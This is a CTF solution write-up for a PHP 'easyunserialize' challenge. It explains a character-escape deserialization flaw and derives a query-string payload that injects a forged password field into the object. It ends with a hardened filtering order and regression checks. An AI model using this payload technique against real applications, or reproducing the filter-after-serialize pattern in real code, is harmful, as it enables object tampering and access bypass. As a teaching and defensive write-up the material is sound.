CTF-37 Solution Walkthrough

Track-子羽   ·   Posted 2021-11-22 17:38:03   ·   CTF & WP board

Source code analysis

    <h3>easyunserialize<h3/>
    <?php
    error_reporting(0);
    highlight_file(__FILE__);
    class a
    {
        public $uname;
        public $password;
        public function __construct($uname,$password)
        {
            $this->uname=$uname;
            $this->password=$password;
        }
        // Runs automatically on unserialize(); prints the flag only if password is the string 'easy'
        public function __wakeup()
        {
            if($this->password==='easy')
            {
                include('flag.php');
                echo $flag;
            }
            else
            {
                echo 'wrong password';
            }
        }
    }
    // Each 'challenge' (9 chars) becomes 'easychallenge' (13 chars)
    function filter($string){
        return str_replace('challenge','easychallenge',$string);
    }
    $uname=$_GET[1];   // user-controlled
    $password=1;       // fixed server-side
    // filter() is applied to the already-serialized string, after the lengths were written
    $ser=filter(serialize(new a($uname,$password)));
    $test=unserialize($ser);
    ?>

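This is a deserialization character-escape problem: filter() lengthens the serialized string after the s:<length> prefixes have already been written. First, look at what normal serialization produces.

Script: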

    <?php
    error_reporting(0);
    class a
    {
        public $uname;
        public $password;
        public function __construct()
        {
            $this->uname='admin';
            $this->password=1;
        }
    }
    function filter($string){
        return str_replace('challenge','easychallenge',$string);
    }
    // Serialize without filtering to see the normal layout
    $ser=serialize(new a());
    echo $ser;
    // Output:
    // O:1:"a":2:{s:5:"uname";s:5:"admin";s:8:"password";i:1;}

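The string that needs to be appended has length 29:

    ";s:8:"password";s:4:"easy";}

After replacement each challenge goes from 9 characters to 13, so the string grows by 4 per occurrence. With m occurrences of challenge in uname, the declared length is 9m + 29, and the replaced text must fill exactly that many characters, which gives the equation:

    9m + 29 = 13m

This does not divide evenly (29 is not a multiple of 4), so try increasing the length of the appended string:

    ";s:8:"password";s:4:"easy";}aaa

Now m = 8, i.e. add 8 copies of challenge.

payload:

    ?1=challengechallengechallengechallengechallengechallengechallengechallenge";s:8:"password";s:4:"easy";}aaa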
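
The root cause is that filter() runs on the serialized string after the s:<length> prefixes were computed. The following added example (not part of the original write-up or the challenge; build_vulnerable() and build_hardened() are hypothetical names) contrasts that order with filtering the value before serialize(), reusing the payload above as a regression input.

```php
<?php
// Added example. Class a and filter() mirror the challenge source;
// build_vulnerable() and build_hardened() are hypothetical helper names.
class a
{
    public $uname;
    public $password;
    public function __construct($uname, $password)
    {
        $this->uname = $uname;
        $this->password = $password;
    }
}

function filter($string)
{
    return str_replace('challenge', 'easychallenge', $string);
}

// Vulnerable order, as in the challenge: filter() rewrites the serialized
// string, so the s:<len> prefix no longer matches the bytes that follow it.
function build_vulnerable($uname)
{
    return unserialize(filter(serialize(new a($uname, 1))));
}

// Hardened order: filter the value, then serialize. The length prefix is
// computed from the final bytes, so input cannot cross a field boundary.
function build_hardened($uname)
{
    $ser = serialize(new a(filter($uname), 1));
    return unserialize($ser, ['allowed_classes' => ['a']]);
}

// Payload from the write-up, reused as a regression input.
$input = str_repeat('challenge', 8) . '";s:8:"password";s:4:"easy";}aaa';

$v = build_vulnerable($input);
$h = build_hardened($input);

// Field integrity checks: password must remain the server-set integer 1,
// and uname must hold the whole filtered input as a single string.
echo 'vulnerable: password overwritten = ';
var_dump($v->password !== 1);
echo 'hardened:   password intact      = ';
var_dump($h->password === 1);
echo 'hardened:   uname is whole input = ';
var_dump($h->uname === filter($input));
```

On PHP 8.3 and later the vulnerable call also raises an E_WARNING about extra trailing data after the serialized value, which is worth logging as a tampering signal.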
